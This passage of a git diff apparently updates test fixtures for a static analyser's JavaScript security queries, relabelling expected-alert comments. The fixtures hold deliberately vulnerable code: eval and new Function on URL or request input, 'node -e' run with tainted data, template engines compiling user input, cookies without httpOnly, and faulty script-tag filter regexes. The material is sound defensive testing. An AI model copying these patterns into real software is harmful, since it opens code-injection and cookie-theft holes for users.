OK + $compile('hello'); }) .controller('MyController', function($compile) { - $compile(location.search); // BAD + $compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($compile) { var compile = $compile; - compile(location.search); // BAD + compile(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($parse) { - $parse(location.search); // BAD + $parse(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($interpolate) { - $interpolate(location.search); // BAD + $interpolate(location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], location.search); // BAD + $filter('orderBy')([], location.search); // $ Alert[js/code-injection] }) .controller('MyController', function($filter) { - $filter('orderBy')([], 'hello'); // OK + $filter('orderBy')([], 'hello'); }) .controller('MyController', function($filter) { - $filter('random')([], location.search); // OK + $filter('random')([], location.search); }) .controller('MyController', function($someService) { - $someService('orderBy')([], location.search); // OK + $someService('orderBy')([], location.search); }) .controller('MyController', function($someService) { - $someService(location.search); // OK + $someService(location.search); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js index f330b1513546..a49288de66ee 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/bad-code-sanitization.js @@ -5,18 +5,18 @@ function safeProp(key) { function test1() { const statements = []; statements.push(`${name}${safeProp(key)}=${stringify(thing[key])}`); - return `(function(){${statements.join(';')}})` // NOT OK + return `(function(){${statements.join(';')}})` // $ Alert[js/bad-code-sanitization] } import htmlescape from 'htmlescape' function test2(props) { const pathname = props.data.pathname; - return `function(){return new Error('${htmlescape(pathname)}')}`; // NOT OK + return `function(){return new Error('${htmlescape(pathname)}')}`; // $ Alert[js/bad-code-sanitization] } function test3(input) { - return `(function(){${JSON.stringify(input)}))` // NOT OK + return `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] } function evenSaferProp(key) { @@ -24,24 +24,24 @@ function evenSaferProp(key) { } function test4(input) { - return `(function(){${evenSaferProp(input)}))` // OK + return `(function(){${evenSaferProp(input)}))` } function test4(input) { - var foo = `(function(){${JSON.stringify(input)}))` // NOT OK - we can type-track to a code-injection sink, the source is not remote flow. + var foo = `(function(){${JSON.stringify(input)}))` // $ Alert[js/bad-code-sanitization] - we can type-track to a code-injection sink, the source is not remote flow. setTimeout(foo); } function test5(input) { - console.log('methodName() => ' + JSON.stringify(input)); // OK + console.log('methodName() => ' + JSON.stringify(input)); } function test6(input) { - return `(() => {${JSON.stringify(input)})` // NOT OK + return `(() => {${JSON.stringify(input)})` // $ Alert[js/bad-code-sanitization] } function test7(input) { - return `() => {${JSON.stringify(input)}` // NOT OK + return `() => {${JSON.stringify(input)}` // $ Alert[js/bad-code-sanitization] } var express = require('express'); @@ -49,7 +49,7 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // NOT - the source is remote-flow, but we know of no sink. + var foo = `(function(){${JSON.stringify(req.param("wobble"))}))` // $ Alert[js/bad-code-sanitization] - the source is remote-flow, but we know of no sink. setTimeout(`(function(){${JSON.stringify(req.param("wobble"))}))`); // OK - the source is remote-flow, and the sink is code-injection. @@ -61,7 +61,7 @@ app.get('/some/path', function(req, res) { // Bad documentation example: function createObjectWrite() { const assignment = `obj[${JSON.stringify(key)}]=42`; - return `(function(){${assignment}})` // NOT OK + return `(function(){${assignment}})` // $ Alert[js/bad-code-sanitization] } // Good documentation example: @@ -87,6 +87,6 @@ function good() { function createObjectWrite() { const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`; - return `(function(){${assignment}})` // OK + return `(function(){${assignment}})` } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js index 3a5abba84c03..58e67741a8c5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js @@ -3,30 +3,23 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // NOT OK - var f = new Function("return wibbles[" + req.param("wobble") + "];"); - // NOT OK - require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); + var f = new Function("return wibbles[" + req.param("wobble") + "];"); // $ Alert + require("vm").runInThisContext("return wibbles[" + req.param("wobble") + "];"); // $ Alert var runC = require("vm").runInNewContext; - // NOT OK - runC("return wibbles[" + req.param("wobble") + "];"); + runC("return wibbles[" + req.param("wobble") + "];"); // $ Alert var vm = require("vm"); - // NOT OK - vm.compileFunction(req.param("code_compileFunction")); - // NOT OK - var script = new vm.Script(req.param("code_Script")); - // NOT OK - var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); - // NOT OK - vm.runInContext(req.param("code_runInContext"), vm.createContext()); + vm.compileFunction(req.param("code_compileFunction")); // $ Alert + var script = new vm.Script(req.param("code_Script")); // $ Alert + var mdl = new vm.SourceTextModule(req.param("code_SourceTextModule")); // $ Alert + vm.runInContext(req.param("code_runInContext"), vm.createContext()); // $ Alert }); const cp = require('child_process'); app.get('/other/path', function(req, res) { const taint = req.param("wobble"); - cp.execFileSync('node', ['-e', taint]); // NOT OK + cp.execFileSync('node', ['-e', taint]); // $ Alert[js/code-injection] - cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); // OK + cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); }); const pty = require('node-pty'); @@ -40,13 +33,13 @@ app.get('/terminal', function(req, res) { env: process.env }); - shell.write(taint); // NOT OK + shell.write(taint); // $ Alert[js/code-injection] }); require("express-ws")(app); app.ws("/socket-thing/", function (ws, req) { ws.on("message", function (msg) { - eval(msg); // NOT OK + eval(msg); // $ Alert[js/code-injection] }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js index 9df334c56dc1..dbb715dfd7a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/lib/index.js @@ -1,17 +1,17 @@ export function unsafeDeserialize(data) { - return eval("(" + data + ")"); // NOT OK + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } export function unsafeGetter(obj, name) { - return eval("obj." + name); // NOT OK + return eval("obj." + name); // $ Alert[js/unsafe-code-construction] } export function safeAssignment(obj, value) { - eval("obj.foo = " + JSON.stringify(value)); // OK + eval("obj.foo = " + JSON.stringify(value)); } global.unsafeDeserialize = function (data) { - return eval("(" + data + ")"); // NOT OK + return eval("(" + data + ")"); // $ Alert[js/unsafe-code-construction] } const matter = require("gray-matter"); @@ -25,7 +25,7 @@ export function greySink(data) { const res = matter(str); console.log(res); - matter(str, { // OK + matter(str, { engines: { js: function (data) { console.log("NOPE"); @@ -48,7 +48,7 @@ export function Template(text, opts) { Template.prototype = { compile: function () { var opts = this.opts; - eval(" var " + opts.varName + " = something();"); // NOT OK + eval(" var " + opts.varName + " = something();"); // $ Alert }, // The below are justs tests that ensure the global-access-path computations terminate. pathsTerminate1: function (node, prev) { @@ -100,10 +100,10 @@ export class AccessPathClass { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert + eval(" var " + this.taint + " = something();"); // $ Alert } } @@ -132,10 +132,10 @@ export class AccessPathClassBB { } doesTaint() { - eval(" var " + this.options1.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options2.taintedOption + " = something();"); // NOT OK - eval(" var " + this.options3.taintedOption + " = something();"); // NOT OK - eval(" var " + this.taint + " = something();"); // NOT OK + eval(" var " + this.options1.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options2.taintedOption + " = something();"); // $ Alert + eval(" var " + this.options3.taintedOption + " = something();"); // $ Alert + eval(" var " + this.taint + " = something();"); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js index 64eeea78f2f1..18885dd25577 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/module.js @@ -6,7 +6,7 @@ var app = express(); app.get('/some/path', function (req, res) { let filename = req.query.filename; var m = new Module(filename, module.parent); - m._compile(req.query.code, filename); // NOT OK + m._compile(req.query.code, filename); // $ Alert[js/code-injection] var m2 = new module.constructor; - m2._compile(req.query.code, filename); // NOT OK + m2._compile(req.query.code, filename); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js index 0a9edc1ebe9c..9c11b511aa27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/react-native.js @@ -5,7 +5,7 @@ var app = express(); app.get('/some/path', function(req, res) { let tainted = req.param("code"); - ; // NOT OK + ; // $ Alert[js/code-injection] let wv = ; - wv.injectJavaScript(tainted); // NOT OK + wv.injectJavaScript(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js index 51554663e4ee..d85b45e076f7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/template-sinks.js @@ -17,18 +17,18 @@ var app = express(); app.get('/some/path', function (req, res) { let tainted = req.query.foo; - pug.compile(tainted); // NOT OK - pug.render(tainted); // NOT OK - jade.compile(tainted); // NOT OK - jade.render(tainted); // NOT OK - dot.template(tainted); // NOT OK - ejs.render(tainted); // NOT OK - nunjucks.renderString(tainted); // NOT OK - lodash.template(tainted); // NOT OK - dot.compile(tainted); // NOT OK - handlebars.compile(tainted); // NOT OK - mustache.render(tainted); // NOT OK - Hogan.compile(tainted); // NOT OK - Eta.render(tainted); // NOT OK - Sqrl.render(tainted); // NOT OK + pug.compile(tainted); // $ Alert[js/code-injection] + pug.render(tainted); // $ Alert[js/code-injection] + jade.compile(tainted); // $ Alert[js/code-injection] + jade.render(tainted); // $ Alert[js/code-injection] + dot.template(tainted); // $ Alert[js/code-injection] + ejs.render(tainted); // $ Alert[js/code-injection] + nunjucks.renderString(tainted); // $ Alert[js/code-injection] + lodash.template(tainted); // $ Alert[js/code-injection] + dot.compile(tainted); // $ Alert[js/code-injection] + handlebars.compile(tainted); // $ Alert[js/code-injection] + mustache.render(tainted); // $ Alert[js/code-injection] + Hogan.compile(tainted); // $ Alert[js/code-injection] + Eta.render(tainted); // $ Alert[js/code-injection] + Sqrl.render(tainted); // $ Alert[js/code-injection] }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js index 5b51da5daf26..0e35c7529112 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/tst.js @@ -1,38 +1,31 @@ -// NOT OK -eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) +eval(document.location.href.substring(document.location.href.indexOf("default=")+8)) // $ Alert + +setTimeout(document.location.hash); // $ Alert -// NOT OK -setTimeout(document.location.hash); -// OK setTimeout(document.location.protocol); -// OK + $('. ' + document.location.hostname); -// NOT OK -Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); +Function(document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1")); // $ Alert -// NOT OK -WebAssembly.compile(document.location.hash); +WebAssembly.compile(document.location.hash); // $ Alert -// NOT OK -WebAssembly.compileStreaming(document.location.hash); +WebAssembly.compileStreaming(document.location.hash); // $ Alert -// NOT OK -eval(atob(document.location.hash.substring(1))); +eval(atob(document.location.hash.substring(1))); // $ Alert -// NOT OK -$('').attr("onclick", location.search.substring(1)); +$('').attr("onclick", location.search.substring(1)); // $ Alert (function test() { var source = document.location.search.replace(/.*\bfoo\s*=\s*([^;]*).*/, "$1"); - new Function(source); // NOT OK + new Function(source); // $ Alert[js/code-injection] - Function(source); // NOT OK + Function(source); // $ Alert[js/code-injection] - new Function("a", "b", source); // NOT OK + new Function("a", "b", source); // $ Alert[js/code-injection] - new Function(...["a", "b"], source); // NOT OK + new Function(...["a", "b"], source); // $ Alert[js/code-injection] })(); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html index 3f62fd326211..1d2014837d27 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.html @@ -1,6 +1,6 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js index 00fb98af9675..e9cb0a8b755c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/webix/webix.js @@ -1,5 +1,5 @@ import * as webix from 'webix'; -webix.exec(document.location.hash); // NOT OK -webix.ui({ template: document.location.hash }); // NOT OK -webix.ui({ template: function () { return document.location.hash } }); // NOT OK \ No newline at end of file +webix.exec(document.location.hash); // $ Alert[js/code-injection] +webix.ui({ template: document.location.hash }); // $ Alert[js/code-injection] +webix.ui({ template: function () { return document.location.hash } }); // $ Alert[js/code-injection] \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js index 8ffd5a8addda..7c97f134bc90 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/example.js @@ -10,5 +10,5 @@ window.addEventListener("message", (ev) => { let message = JSON.parse(ev.data); // Let the parent frame call the 'play' or 'pause' function - window[message.name](message.payload); // NOT OK + window[message.name](message.payload); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js index 2119fa97ed23..a5c32b914c70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-094/UnsafeDynamicMethodAccess/tst.js @@ -2,21 +2,21 @@ let obj = {}; window.addEventListener('message', (ev) => { let message = JSON.parse(ev.data); - window[message.name](message.payload); // NOT OK - may invoke eval - new window[message.name](message.payload); // NOT OK - may invoke jQuery $ function or similar + window[message.name](message.payload); // $ Alert - may invoke eval + new window[message.name](message.payload); // $ Alert - may invoke jQuery $ function or similar window["HTMLElement" + message.name](message.payload); // OK - concatenation restricts choice of methods window[`HTMLElement${message.name}`](message.payload); // OK - concatenation restricts choice of methods function f() {} - f[message.name](message.payload)(); // NOT OK - may acccess Function constructor + f[message.name](message.payload)(); // $ Alert - may acccess Function constructor obj[message.name](message.payload); // OK - may crash, but no code execution involved - window[ev](ev); // NOT OK + window[ev](ev); // $ Alert window[configData() + ' ' + message.name](message.payload); // OK - concatenation restricts choice of methods window[configData() + message.name](message.payload); // OK - concatenation restricts choice of methods - window['' + message.name](message.payload); // NOT OK - coercion does not restrict choice of methods + window['' + message.name](message.payload); // $ Alert - coercion does not restrict choice of methods }); diff --git a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js index b91f82c781f2..492990b49082 100644 --- a/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js +++ b/javascript/ql/test/query-tests/Security/CWE-1004/tst-httpOnly.js @@ -5,19 +5,19 @@ const session = require('cookie-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: true, // GOOD + httpOnly: true, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: false // BAD + httpOnly: false // $ Alert })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - secure: true // GOOD, httpOnly is true by default + secure: true // OK - httpOnly is true by default })) var sess = { @@ -26,7 +26,7 @@ var sess = { } sess.httpOnly = false; -app.use(session(sess)) // BAD +app.use(session(sess)) // $ Alert var sess2 = { name: 'session', @@ -35,7 +35,7 @@ var sess2 = { } sess2.httpOnly = false; -app.use(session(sess2)) // BAD +app.use(session(sess2)) // $ Alert var sess3 = { name: 'mycookie', @@ -44,21 +44,21 @@ var sess3 = { } sess3.httpOnly = false; -app.use(session(sess3)) // BAD, It is a session cookie, name doesn't matter +app.use(session(sess3)) // $ Alert - It is a session cookie, name doesn't matter var flag = false var flag2 = flag app.use(session({ name: 'session', keys: ['key1', 'key2'], - httpOnly: flag2 // BAD + httpOnly: flag2 // $ Alert })) app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false }); res.end('ok') @@ -68,7 +68,7 @@ app.get('/a', function (req, res, next) { res.cookie('authkey', 'value', { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, // $ Alert secure: false }); res.end('ok') @@ -79,13 +79,13 @@ app.get('/a', function (req, res, next) { { maxAge: 9000000000 }); - res.end('ok') // BAD + res.end('ok') // $ Alert }) app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: true, // GOOD + httpOnly: true, secure: false } res.cookie('authkey', 'value', options); @@ -95,7 +95,7 @@ app.get('/a', function (req, res, next) { app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000, - httpOnly: false, // BAD + httpOnly: false, // $ Alert secure: false } res.cookie('authkey', 'value', options); @@ -106,7 +106,7 @@ app.get('/a', function (req, res, next) { let options = { maxAge: 9000000000 } - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -115,7 +115,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -124,7 +124,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000 } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -134,7 +134,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = false; - res.cookie('authkey', 'value', options); // BAD + res.cookie('authkey', 'value', options); // $ Alert res.end('ok') }) @@ -145,7 +145,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let authKey = "blabla" - res.cookie(authKey, 'value', options); // BAD, var name likely auth related + res.cookie(authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -156,7 +156,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let o = { authKey: "blabla" } - res.cookie(o.authKey, 'value', options); // BAD, var name likely auth related + res.cookie(o.authKey, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -167,7 +167,7 @@ app.get('/a', function (req, res, next) { } options.httpOnly = false; let blabla = "authKey" - res.cookie(blabla, 'value', options); // BAD, var name likely auth related + res.cookie(blabla, 'value', options); // $ Alert - var name likely auth related res.end('ok') }) @@ -177,7 +177,7 @@ app.get('/a', function (req, res, next) { httpOnly: true, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -187,7 +187,7 @@ app.get('/a', function (req, res, next) { httpOnly: false, } options.httpOnly = true; - res.cookie('authkey', 'value', options); // GOOD + res.cookie('authkey', 'value', options); res.end('ok') }) @@ -196,7 +196,7 @@ app.get('/a', function (req, res, next) { maxAge: 9000000000, httpOnly: false, } - res.cookie('mycookie', 'value', options); // GOOD, name likely is not auth sensitive + res.cookie('mycookie', 'value', options); // OK - name likely is not auth sensitive res.end('ok') }) @@ -205,8 +205,7 @@ const http = require('http'); function test1() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", "authKey=ninja"); + res.setHeader("Set-Cookie", "authKey=ninja"); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -215,7 +214,7 @@ function test1() { function test2() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", "auth=ninja; HttpOnly"); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -225,8 +224,7 @@ function test2() { function test3() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // BAD - res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); + res.setHeader("Set-Cookie", ["authKey=ninja", "token=javascript"]); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -235,7 +233,7 @@ function test3() { function test4() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD + res.setHeader("Set-Cookie", ["auth=ninja; HttpOnly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -245,7 +243,7 @@ function test4() { function test5() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // GOOD, case insensitive + // OK - case insensitive res.setHeader("Set-Cookie", ["auth=ninja; httponly"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -265,7 +263,7 @@ function test6() { function test7() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - // Good, not auth related + // OK - not auth related res.setHeader("Set-Cookie", ["foo=ninja", "bar=javascript"]); res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); @@ -276,7 +274,7 @@ function test8() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; httponly" - res.setHeader("Set-Cookie", `session=ninja ${attr}`); // Good, httponly string expression + res.setHeader("Set-Cookie", `session=ninja ${attr}`); // OK - httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -286,7 +284,7 @@ function test9() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); let attr = "; secure" - res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // Bad, not httponly string expression + res.setHeader("Set-Cookie", `authKey=ninja ${attr}`); // $ Alert - not httponly string expression res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); @@ -297,22 +295,22 @@ const session = require('express-session') app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: true }, // GOOD + cookie: { httpOnly: true }, })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD + cookie: { httpOnly: false } // $ Alert })) app.use(session({ name: 'session', keys: ['key1', 'key2'], - cookie: { secure: true } // GOOD, httpOnly is true by default + cookie: { secure: true } // OK - httpOnly is true by default })) -app.use(session({ // GOOD, httpOnly is true by default +app.use(session({ // OK - httpOnly is true by default name: 'session', keys: ['key1', 'key2'] })) @@ -320,14 +318,14 @@ app.use(session({ // GOOD, httpOnly is true by default app.use(session({ name: 'mycookie', keys: ['key1', 'key2'], - cookie: { httpOnly: false } // BAD, It is a session cookie, name doesn't matter + cookie: { httpOnly: false } // $ Alert - It is a session cookie, name doesn't matter })) const http = require('http'); function test10() { const server = http.createServer((req, res) => { res.setHeader('Content-Type', 'text/html'); - res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // BAD + res.setHeader("Set-Cookie", "sessionKey=" + makeSessionKey()); // $ Alert res.writeHead(200, { 'Content-Type': 'text/plain' }); res.end('ok'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js index 5b294adae1b7..5fdc3b0c798e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js @@ -1,25 +1,25 @@ var filters = [ - /.*?<\/script>/i, // NOT OK - doesn't match newlines or `` - /.*?<\/script>/is, // NOT OK - doesn't match `` - /.*?<\/script[^>]*>/is, // OK + /.*?<\/script>/i, // $ Alert - doesn't match newlines or `` + /.*?<\/script>/is, // $ Alert - doesn't match `` + /.*?<\/script[^>]*>/is, //is, // OK - we don't care regexps that only match comments - /)|([^\/\s>]+)[\S\s]*?>/, // NOT OK - doesn't match comments with the right capture groups - /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // NOT OK - capture groups - /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // NOT OK - capture groups - /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // NOT OK - capture groups - /|<([^>]*?)>/g, // NOT OK - capture groups + /)|([^\/\s>]+)[\S\s]*?>/, // $ Alert - doesn't match comments with the right capture groups + /<(?:(?:\/([^>]+)>)|(?:!--([\S|\s]*?)-->)|(?:([^\/\s>]+)((?:\s+[\w\-:.]+(?:\s*=\s*?(?:(?:"[^"]*")|(?:'[^']*')|[^\s"'\/>]+))?)*)[\S\s]*?(\/?)>))/, // $ Alert - capture groups + /(<[a-z\/!$]("[^"]*"|'[^']*'|[^'">])*>|)/gi, // $ Alert - capture groups + /<(?:(?:!--([\w\W]*?)-->)|(?:!\[CDATA\[([\w\W]*?)\]\]>)|(?:!DOCTYPE([\w\W]*?)>)|(?:\?([^\s\/<>]+) ?([\w\W]*?)[?/]>)|(?:\/([A-Za-z][A-Za-z0-9\-_\:\.]*)>)|(?:([A-Za-z][A-Za-z0-9\-_\:\.]*)((?:\s+[^"'>]+(?:(?:"[^"]*")|(?:'[^']*')|[^>]*))*|\/|\s+)>))/g, // $ Alert - capture groups + /|<([^>]*?)>/g, // $ Alert - capture groups ] doFilters(filters) @@ -28,8 +28,8 @@ var strip = ']*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used w new RegExp(strip, 'gi'); var moreFilters = [ - /-->/g, // NOT OK - doesn't match --!> - /^>|^->||--!>|/g, // $ Alert - doesn't match --!> + /^>|^->||--!>|\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi, expanded); // $ Alert // lib2 html.replace( /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([\w:]+)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([\w:]+)[^>]*)\/>/gi, expanded); // $ Alert // lib3 html.replace( /<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi, expanded - ); // NOT OK - html.replace(/<(([\w:-]+)[^>]*)\/>/gi, expanded); // NOT OK + ); // $ Alert + html.replace(/<(([\w:-]+)[^>]*)\/>/gi, expanded); // $ Alert - html.replace(defaultPattern, expanded); // NOT OK + html.replace(defaultPattern, expanded); // $ Alert function getPattern() { return defaultPattern; } - html.replace(getPattern(), expanded); // NOT OK + html.replace(getPattern(), expanded); // $ Alert function getExpanded() { return expanded; } - html.replace(defaultPattern, getExpanded()); // NOT OK (but not tracking the expansion string) - html.replace(defaultPattern, something); // OK (possibly) - defaultPattern.match(something); // OK (possibly) - getPattern().match(something); // OK (possibly) + html.replace(defaultPattern, getExpanded()); // MISSING: Alert - not tracking the expansion string + html.replace(defaultPattern, something); // OK - possibly + defaultPattern.match(something); // OK - possibly + getPattern().match(something); // OK - possibly }); diff --git a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js b/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js index 2c31e247bf22..680535452194 100644 --- a/javascript/ql/test/query-tests/Security/CWE-116/IncompleteSanitization/tst-multi-character-sanitization.js +++ 